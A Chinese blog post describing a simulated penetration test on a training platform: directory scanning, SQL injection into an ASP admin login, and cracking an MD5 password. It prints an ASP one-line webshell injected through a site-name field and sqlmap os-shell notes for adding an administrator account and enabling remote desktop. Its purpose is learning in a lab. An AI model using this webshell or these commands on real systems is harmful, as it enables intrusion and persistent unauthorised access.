【我很简单,请不要欺负我】模拟环境渗透详细记录
首先感谢i春秋提供的模拟环境,实验内容记录如下,部分步骤参考了官方攻略
实验地址如下:
https://www.ichunqiu.com/racing/54399
下面开始实验内容记录:
实验环境构造完毕,提示我们目标网站为www.test.ichunqiu
其实打开网站有个很明显的信息就出来了,魅力企业网站管理系统,百度一下,很多,源码都开放了,下载一份,可疑了解其文件配置基本格式
右下角的机器人开始了第一个问题
这个还是很简单的,虽然没用过,百度了下可知答案为漏洞扫描工具
接下来就是第二个问题了
得,开始x站
x站第一步,扫目录,一般ctf中可能会关注到.svn,robot.txt,vim编辑器导致的.vim后缀等等
看过各个牛逼的大佬们的渗透思路中,一般扫目录是找后台登录界面,即网站管理者的登录页面
我自己用的是北极熊,虚拟环境中提供的扫目录工具,熟悉一点的当然是众所周知的御剑了,话不多说,御剑开扫
(注:实验中遇到的各个工具不做具体说明操作,自己百度教程)
把几个可疑的都打开看了一下,最后确定是www.test.ichunqiu/admin/login.asp
这里有个admin,password,一开始想bp看看,然后sqlmap试试的,话说提供的工具中啥都没找到,好吧,又得用新工具,在工具包注入文件夹看到了一个稍微熟悉点的明小子,听过,没遇到过,百度了下基本用法,开工:
工具使用略过,直接到登录页面开撸
瞬间怀疑人生了就,莫非我注入了一个假的数据库!!!参考官方答案,原来这里还有个md5加密= =||,找了个网站进行解密,第一个很容易,admin888,另一个要不解不开,要不要收费,官方也只解了一个admin888
再次登录,bingo!
答题,没毛病,admin888,
于是又出现了第三题,,,,本来以为都结束了,看来是我太年轻
啧啧啧,webshell,对萌新来说这可是个新名词,百度了一下解释
webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,然后通过页面访问的形式进行入侵,或者通过插入一句话连接本地的一些相关工具直接对服务器进行入侵操作。
好吧,到此卡主了,萌新心里痛,开始了跟着答案做的阶段
webshell答案给的是在网站名字那里修改,加上一句话木马
"%><%Eval Request(Chr(35))%><%'
一开始没懂啥意思,看了不少资料,然后自己瞎试了试“”之类的东西,算是理解了这句话,
边上的那些符号是起闭合作用的,
Eval是执行函数,char(35)指的是#
反正联合起来的意思就是以后#参数带的代码都可以直接被服务器执行(很拗口啊,结合百度理解下吧,博主只是萌新,见谅,见谅)
懂了这个意思后就自己尝试咯
换了个地方,自己把参数换成了a
后面的用中国菜刀,当然,我也跟着更换了地址
没毛病,点击就连接进了服务器文件库
第三题答案也出来了,修改文件配置
第四题
最后一题了,目标服务器,按照官方答案一步步结束了(详情见博客上分链接i春秋官方答案)
这里补充个以前sqlmap的学习笔记:
sqlmap.py - u "url" --os-shell
拿到权限后 os-shell
Net user 查看本机的用户列表
Net user "用户名" "密码" /add 添加用户
Net localgroup administrators XXX/add 将用户添加到administrators中
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal "" Server/v fDenyTSConnections /t REG_DWORD /d 00000000 /f
修改注册表开启远程桌面端口3389
WIN+R mstsc 远程桌面连接
其实感觉吧,万变不离其宗,原理也差不多,总结至此,有问题欢迎一起讨论~上一篇: IDEA搭建SpringBoot集成Jsp的辛酸历程
下一篇: CVE-2016-5195漏洞复现